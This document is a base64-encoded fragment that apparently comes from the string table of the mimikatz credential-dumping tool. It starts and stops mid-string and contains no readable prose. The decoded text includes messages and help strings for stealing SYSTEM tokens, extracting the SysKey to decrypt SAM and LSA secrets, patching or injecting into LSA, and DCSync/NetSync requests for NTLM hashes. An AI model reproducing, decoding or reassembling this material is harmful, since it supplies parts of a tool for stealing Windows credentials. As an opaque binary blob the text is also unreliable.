ABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgAHMAdABvAHAAcABlAGQACgAAAAAAAAAAAAAAAAAAAAAAWwAqAF0AIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgAG4AbwB0ACAAcgB1AG4AbgBpAG4AZwAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AcgBlAG0AbwB2AGUAXwBtAGkAbQBpAGQAcgB2ACAAOwAgAGsAdQBsAGwAXwBtAF8AcwBlAHIAdgBpAGMAZQBfAHMAdABvAHAAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAWwArAF0AIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgAHIAZQBtAG8AdgBlAGQACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAHIAZQBtAG8AdgBlAF8AbQBpAG0AaQBkAHIAdgAgADsAIABrAHUAbABsAF8AbQBfAHMAZQByAHYAaQBjAGUAXwByAGUAbQBvAHYAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAcgBlAG0AbwB2AGUAAAAAAFAAcgBvAGMAZQBzAHMAIAA6ACAAJQBzAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAHAAcgBvAGMAZQBzAHMAUAByAG8AdABlAGMAdAAgADsAIABrAHUAbABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBnAGUAdABQAHIAbwBjAGUAcwBzAEkAZABGAG8AcgBOAGEAbQBlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAcABpAGQAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AcAByAG8AYwBlAHMAcwBQAHIAbwB0AGUAYwB0ACAAOwAgAEEAcgBnAHUAbQBlAG4AdAAgAC8AcAByAG8AYwBlAHMAcwA6AHAAcgBvAGcAcgBhAG0ALgBlAHgAZQAgAG8AcgAgAC8AcABpAGQAOgBwAHIAbwBjAGUAcwBzAGkAZAAgAG4AZQBlAGQAZQBkAAoAAAAAAAAAAABQAEkARAAgACUAdQAgAC0APgAgACUAMAAyAHgALwAlADAAMgB4ACAAWwAlADEAeAAtACUAMQB4AC0AJQAxAHgAXQAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBwAHIAbwBjAGUAcwBzAFAAcgBvAHQAZQBjAHQAIAA7ACAATgBvACAAUABJAEQACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBwAHIAbwBjAGUAcwBzAFAAcgBvAHQAZQBjAHQAIAA7ACAAUAByAG8AdABlAGMAdABlAGQAIABwAHIAbwBjAGUAcwBzACAAbgBvAHQAIABhAHYAYQBpAGwAYQBiAGwAZQAgAGIAZQBmAG8AcgBlACAAVwBpAG4AZABvAHcAcwAgAFYAaQBzAHQAYQAKAAAAAABmAHIAbwBtAAAAAAB0AG8AAAAAAAAAAABUAG8AawBlAG4AIABmAHIAbwBtACAAcAByAG8AYwBlAHMAcwAgACUAdQAgAHQAbwAgAHAAcgBvAGMAZQBzAHMAIAAlAHUACgAAAAAAAAAAACAAKgAgAGYAcgBvAG0AIAAwACAAdwBpAGwAbAAgAHQAYQBrAGUAIABTAFkAUwBUAEUATQAgAHQAbwBrAGUAbgAKAAAAAAAAAAAAAAAAAAAAIAAqACAAdABvACAAMAAgAHcAaQBsAGwAIAB0AGEAawBlACAAYQBsAGwAIAAnAGMAbQBkACcAIABhAG4AZAAgACcAbQBpAG0AaQBrAGEAdAB6ACcAIABwAHIAbwBjAGUAcwBzAAoAAABLAGUAcgBuAGUAbABfAEwAcwBhAF8AUABwAGwAXwBDAG8AbgBmAGkAZwAAAAAAAAAAAAAAAAAAAHsANwA3AGYAYQA5AGEAYgBkAC0AMAAzADUAOQAtADQAZAAzADIALQBiAGQANgAwAC0AMgA4AGYANABlADcAOABmADcAOAA0AGIAfQAAAAAAZwB1AGkAZAAAAAAAMQAAAGEAdAB0AHIAaQBiAHUAdABlAHMAAAAAADAAMAAwADAAMAAwADAAMAAAAAAAAAAAAE4AYQBtAGUAIAAgACAAIAAgACAAIAA6ACAAJQB3AFoACgBWAGUAbgBkAG8AcgAgAEcAVQBJAEQAOgAgAAAAAAAKAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA6ACAAJQAwADgAeAAgACgAAAAAAAAAAABMAGUAbgBnAHQAaAAgACAAIAAgACAAOgAgACUAdQAKAEQAYQB0AGEAIAAgACAAIAAgACAAIAA6ACAAAAAAAAAAPgAgAE8ASwAhAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBzAHkAcwBlAG4AdgBfAHMAZQB0ACAAOwAgAFIAdABsAEcAVQBJAEQARgByAG8AbQBTAHQAcgBpAG4AZwA6ACAAMAB4ACUAMAA4AHgACgAAACkACgAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAHMAeQBzAGUAbgB2AF8AZABlAGwAIAA7ACAAUgB0AGwARwBVAEkARABGAHIAbwBtAFMAdAByAGkAbgBnADoAIAAwAHgAJQAwADgAeAAKAAAAcwBhAG0AAABHAGUAdAAgAHQAaABlACAAUwB5AHMASwBlAHkAIAB0AG8AIABkAGUAYwByAHkAcAB0ACAAUwBBAE0AIABlAG4AdAByAGkAZQBzACAAKABmAHIAbwBtACAAcgBlAGcAaQBzAHQAcgB5ACAAbwByACAAaABpAHYAZQBzACkAAAAAAHMAZQBjAHIAZQB0AHMAAABHAGUAdAAgAHQAaABlACAAUwB5AHMASwBlAHkAIAB0AG8AIABkAGUAYwByAHkAcAB0ACAAUwBFAEMAUgBFAFQAUwAgAGUAbgB0AHIAaQBlAHMAIAAoAGYAcgBvAG0AIAByAGUAZwBpAHMAdAByAHkAIABvAHIAIABoAGkAdgBlAHMAKQAAAAAAAAAAAAAAAABHAGUAdAAgAHQAaABlACAAUwB5AHMASwBlAHkAIAB0AG8AIABkAGUAYwByAHkAcAB0ACAATgBMACQASwBNACAAdABoAGUAbgAgAE0AUwBDAGEAYwBoAGUAKAB2ADIAKQAgACgAZgByAG8AbQAgAHIAZQBnAGkAcwB0AHIAeQAgAG8AcgAgAGgAaQB2AGUAcwApAAAAAAAAAGwAcwBhAAAAQQBzAGsAIABMAFMAQQAgAFMAZQByAHYAZQByACAAdABvACAAcgBlAHQAcgBpAGUAdgBlACAAUwBBAE0ALwBBAEQAIABlAG4AdAByAGkAZQBzACAAKABuAG8AcgBtAGEAbAAsACAAcABhAHQAYwBoACAAbwBuACAAdABoAGUAIABmAGwAeQAgAG8AcgAgAGkAbgBqAGUAYwB0ACkAAAAAAHQAcgB1AHMAdAAAAAAAAABBAHMAawAgAEwAUwBBACAAUwBlAHIAdgBlAHIAIAB0AG8AIAByAGUAdAByAGkAZQB2AGUAIABUAHIAdQBzAHQAIABBAHUAdABoACAASQBuAGYAbwByAG0AYQB0AGkAbwBuACAAKABuAG8AcgBtAGEAbAAgAG8AcgAgAHAAYQB0AGMAaAAgAG8AbgAgAHQAaABlACAAZgBsAHkAKQAAAAAAYgBhAGMAawB1AHAAawBlAHkAcwAAAAAAcgBwAGQAYQB0AGEAAAAAAGQAYwBzAHkAbgBjAAAAAAAAAAAAAAAAAEEAcwBrACAAYQAgAEQAQwAgAHQAbwAgAHMAeQBuAGMAaAByAG8AbgBpAHoAZQAgAGEAbgAgAG8AYgBqAGUAYwB0AAAAAAAAAG4AZQB0AHMAeQBuAGMAAAAAAAAAAAAAAEEAcwBrACAAYQAgAEQAQwAgAHQAbwAgAHMAZQBuAGQAIABjAHUAcgByAGUAbgB0ACAAYQBuAGQAIABwAHIAZQB2AGkAbwB1AHMAIABOAFQATABNACAAaABhAHMAaAAgAG8AZgAgAEQAQwAvAFMAUgBWAC8AVwBLAFMAAAAAAAAAbABzAGEAZAB1AG0AcAAAAEwAcwBhAEQAdQBtAHAAIABtAG8AZAB1AGwAZQAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AcwBhAG0AIAA7ACAAQwByAGUAYQB0AGUARgBpAGwAZQAgACgAUwBBAE0AIABoAGkAdgBlACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBzAGEAbQAgADsAIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKABTAFkAUwBUAEUATQAgAGgAaQB2AGUAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAFMAWQBTAFQARQBNAAAAAABTAEEATQAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AcwBhAG0AIAA7ACAAawB1AGwAbABfAG0AXwByAGUAZwBpAHMAdAByAHkAXwBSAGUAZwBPAHAAZQBuAEsAZQB5AEUAeAAgACgAUwBBAE0AKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAPgAgAFUAcwBlAHIAIABjAGEAYwBoAGUAIAByAGUAcABsAGEAYwBlACAAbQBvAGQAZQAgACEACgAAAAAAAAAAACAAIAAqACAAdQBzAGUAcgAgACAAIAAgACAAOgAgACUAcwAKAAAAAABuAHQAbABtAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBzAGUAYwByAGUAdABzAE8AcgBDAGEAYwBoAGUAIAA7ACAAbgB0AGwAbQAgAGgAYQBzAGgAIABsAGUAbgBnAHQAaAAgAG0AdQBzAHQAIABiAGUAIAAzADIAIAAoADEANgAgAGIAeQB0AGUAcwApACAALQAgAHcAaQBsAGwAIAB1AHMAZQAgAGQAZQBmAGEAdQBsAHQAIABwAGEAcwBzAHcAbwByAGQALgAuAC4ACgAAAAAAAAAAACAAIAAqACAAcABhAHMAcwB3AG8AcgBkACAAOgAgACUAcwAKAAAAAAAgACAAKgAgAG4AdABsAG0AIAAgACAAIAAgADoAIAAAAHMAZQBjAHUAcgBpAHQAeQAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAZQBjAHIAZQB0AHMATwByAEMAYQBjAGgAZQAgADsAIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKABTAEUAQwBVAFIASQBUAFkAIABoAGkAdgBlACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBzAGUAYwByAGUAdABzAE8AcgBDAGEAYwBoAGUAIAA7ACAAQwByAGUAYQB0AGUARgBpAGwAZQAgACgAUwBZAFMAVABFAE0AIABoAGkAdgBlACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAFMARQBDAFUAUgBJAFQAWQAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAZQBjAHIAZQB0AHMATwByAEMAYQBjAGgAZQAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAE8AcABlAG4ASwBlAHkARQB4ACAAKABTAEUAQwBVAFIASQBUAFkAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAQwB1AHIAcgBlAG4AdAAAAEQAZQBmAGEAdQBsAHQAAABDAG8AbgB0AHIAbwBsAFMAZQB0ADAAMAAwAAAAAAAAAFMAZQBsAGUAYwB0AAAAAAAlADAAMwB1AAAAAABKAEQAAAAAAAAAAABTAGsAZQB3ADEAAAAAAAAARwBCAEcAAABEAGEAdABhAAAAAAAlAHgAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFMAeQBzAGsAZQB5ACAAOwAgAEwAUwBBACAASwBlAHkAIABDAGwAYQBzAHMAIAByAGUAYQBkACAAZQByAHIAbwByAAoAAAAAAEQAbwBtAGEAaQBuACAAOgAgAAAAAAAAAEMAbwBtAHAAdQB0AGUAcgBOAGEAbQBlAAAAAAAAAAAAQwBvAG4AdAByAG8AbABcAEMAbwBtAHAAdQB0AGUAcgBOAGEAbQBlAFwAQwBvAG0AcAB1AHQAZQByAE4AYQBtAGUAAAAAAAAAJQBzAAoAAABTAHkAcwBLAGUAeQAgADoAIAAAAAAAAABDAG8AbgB0AHIAbwBsAFwATABTAEEAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABDAG8AbQBwAHUAdABlAHIAQQBuAGQAUwB5AHMAawBlAHkAIAA7ACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQAUwB5AHMAawBlAHkAIABLAE8ACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQAQwBvAG0AcAB1AHQAZQByAEEAbgBkAFMAeQBzAGsAZQB5ACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcATwBwAGUAbgBLAGUAeQBFAHgAIABMAFMAQQAgAEsATwAKAAAAAABWAAAAUwBBAE0AXABEAG8AbQBhAGkAbgBzAFwAQQBjAGMAbwB1AG4AdAAAAEwAbwBjAGEAbAAgAFMASQBEACAAOgAgAAAAAAAAAAAAVQBzAGUAcgBzAAAAAAAAAE4AYQBtAGUAcwAAAAAAAAAKAFIASQBEACAAIAA6ACAAJQAwADgAeAAgACgAJQB1ACkACgAAAAAAVQBzAGUAcgAgADoAIAAlAC4AKgBzAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFUAcwBlAHIAcwBBAG4AZABTAGEAbQBLAGUAeQAgADsAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABTAGEAbQBLAGUAeQAgAEsATwAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFUAcwBlAHIAcwBBAG4AZABTAGEAbQBLAGUAeQAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAE8AcABlAG4ASwBlAHkARQB4ACAAUwBBAE0AIABBAGMAYwBvAHUAbgB0AHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAE4AVABMAE0AAAAAAAAAAABMAE0AIAAgAAAAAAAAAAAAJQBzACAAOgAgAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AEgAYQBzAGgAIAA7ACAAUgB0AGwARQBuAGMAcgB5AHAAdABEAGUAYwByAHkAcAB0AFIAQwA0AAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABIAGEAcwBoACAAOwAgAEgAYQBzAGgAIABzAGkAegBlACAAJQB1ACAAIQA9ACAAJQB1AAAAAAAAAAAAA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AAgAGkAdABlAHIAYQB0AGkAbwBuACgAcwApAAoAAAAAAAAAAAAqACAARABDAEMAMQAgAG0AbwBkAGUAIAAhAAoAAAAAAAAAAAAAAAAAKgAgAEkAdABlAHIAYQB0AGkAbwBuACAAaQBzACAAcwBlAHQAIAB0AG8AIABkAGUAZgBhAHUAbAB0ACAAKAAxADAAMgA0ADAAKQAKAAAAAABOAEwAJABDAG8AbgB0AHIAbwBsAAAAAAAKAFsAJQBzACAALQAgAAAAXQAKAFIASQBEACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAAAAAAA+ACAAVQBzAGUAcgAgAGMAYQBjAGgAZQAgAHIAZQBwAGwAYQBjAGUAIABtAG8AZABlACAAKAAyACkAIQAKAAAAIAAgAE0AcwBDAGEAYwBoAGUAVgAyACAAOgAgAAAAAAAgACAAQwBoAGUAYwBrAHMAdQBtACAAIAA6ACAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AE4ATABLAE0AUwBlAGMAcgBlAHQAQQBuAGQAQwBhAGMAaABlACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcAUwBlAHQAVgBhAGwAdQBlAEUAeAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAPgAgAFUAcwBlAHIAIABjAGEAYwBoAGUAIAByAGUAcABsAGEAYwBlACAAbQBvAGQAZQAgACgAMQApACEACgAAACAAIABNAHMAQwBhAGMAaABlAFYAMQAgADoAIAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQATgBMAEsATQBTAGUAYwByAGUAdABBAG4AZABDAGEAYwBoAGUAIAA7ACAAUgB0AGwARQBuAGMAcgB5AHAAdABEAGUAYwByAHkAcAB0AFIAQwA0ACAAOgAgADAAeAAlADAAOAB4AAoAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AE4ATABLAE0AUwBlAGMAcgBlAHQAQQBuAGQAQwBhAGMAaABlACAAOwAgAGsAdQBsAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBoAG0AYQBjACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAVQBzAGUAcgAgACAAIAAgACAAIAA6ACAAJQAuACoAcwBcACUALgAqAHMACgAAAAAATQBzAEMAYQBjAGgAZQBWACUAYwAgADoAIAAAAAAAAABPAGIAagBlAGMAdABOAGEAbQBlAAAAAAAgAC8AIABzAGUAcgB2AGkAYwBlACAAJwAlAHMAJwAgAHcAaQB0AGgAIAB1AHMAZQByAG4AYQBtAGUAIAA6ACAAJQAuACoAcwAAAAAAAAAAAHQAZQB4AHQAOgAgACUAdwBaAAAAAAAAAGgAZQB4ACAAOgAgAAAAAAAkAE0AQQBDAEgASQBOAEUALgBBAEMAQwAAAAAAAAAAAAoAIAAgACAAIABOAFQATABNADoAAAAAAAoAIAAgACAAIABTAEgAQQAxADoAAAAAAEQAUABBAFAASQBfAFMAWQBTAFQARQBNAAAAAAAAAAAACgAgACAAIAAgAGYAdQBsAGwAOgAgAAAACgAgACAAIAAgAG0ALwB1ACAAOgAgAAAAIAAvACAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBzAGUAYwBfAGEAZQBzADIANQA2ACAAOwAgAEMAcgB5AHAAdABEAGUAYwByAHkAcAB0ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAZQBjAF8AYQBlAHMAMgA1ADYAIAA7ACAAQwByAHkAcAB0AFMAZQB0AEsAZQB5AFAAYQByAGEAbQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AcwBlAGMAXwBhAGUAcwAyADUANgAgADsAIABrAHUAbABsAF8AbQBfAGMAcgB5AHAAdABvAF8AaABrAGUAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABzAGEAbQBzAHIAdgAuAGQAbABsAAAAAABsAHMAYQBzAHIAdgAuAGQAbABsAAAAAABuAHQAZABsAGwALgBkAGwAbAAAAAAAAABrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAAAAAAAAAAAFNhbUlDb25uZWN0AAAAAABTYW1yQ2xvc2VIYW5kbGUAU2FtSVJldHJpZXZlUHJpbWFyeUNyZWRlbnRpYWxzAABTYW1yT3BlbkRvbWFpbgAAU2Ftck9wZW5Vc2VyAAAAAFNhbXJRdWVyeUluZm9ybWF0aW9uVXNlcgAAAAAAAAAAU2FtSUZyZWVfU0FNUFJfVVNFUl9JTkZPX0JVRkZFUgBMc2FJUXVlcnlJbmZvcm1hdGlvblBvbGljeVRydXN0ZWQAAAAAAAAATHNhSUZyZWVfTFNBUFJfUE9MSUNZX0lORk9STUFUSU9OAAAAAAAAAFZpcnR1YWxBbGxvYwAAAABtZW1jcHkAAHAAYQB0AGMAaAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQAgADsAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbABzAGEAIAA7ACAAawB1AGwAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAHQAVgBlAHIAeQBCAGEAcwBpAGMATQBvAGQAdQBsAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuAHMARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAGkAbgBqAGUAYwB0AAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGwAcwBhACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBDAHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBDAG8AZABlAFcAaQB0AHQAaABQAGEAdAB0AGUAcgBuAFIAZQBwAGwAYQBjAGUACgAAAAAAAAAAAEQAbwBtAGEAaQBuACAAOgAgACUAdwBaACAALwAgAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQAgADsAIABTAGEAbQBMAG8AbwBrAHUAcABJAGQAcwBJAG4ARABvAG0AYQBpAG4AIAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbABzAGEAIAA7ACAAJwAlAHMAJwAgAGkAcwAgAG4AbwB0ACAAYQAgAHYAYQBsAGkAZAAgAEkAZAAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGwAcwBhACAAOwAgAFMAYQBtAEwAbwBvAGsAdQBwAE4AYQBtAGUAcwBJAG4ARABvAG0AYQBpAG4AIAAlADAAOAB4AAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQAgADsAIABTAGEAbQBFAG4AdQBtAGUAcgBhAHQAZQBVAHMAZQByAHMASQBuAEQAbwBtAGEAaQBuACAAJQAwADgAeAAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGwAcwBhACAAOwAgAFMAYQBtAE8AcABlAG4ARABvAG0AYQBpAG4AIAAlADAAOAB4AAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGwAcwBhACAAOwAgAFMAYQBtAEMAbwBuAG4AZQBjAHQAIAAlADAAOAB4AAoAAABTAGEAbQBTAHMAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBsAHMAYQBfAGcAZQB0AEgAYQBuAGQAbABlACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGwAcwBhAF8AZwBlAHQASABhAG4AZABsAGUAIAA7ACAAawB1AGwAbABfAG0AXwBzAGUAcgB2AGkAYwBlAF8AZwBlAHQAVQBuAGkAcQB1AGUARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAKAFIASQBEACAAIAA6ACAAJQAwADgAeAAgACgAJQB1ACkACgBVAHMAZQByACAAOgAgACUAdwBaAAoAAAAAAAAATABNACAAIAAgADoAIAAAAAoATgBUAEwATQAgADoAIAAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8A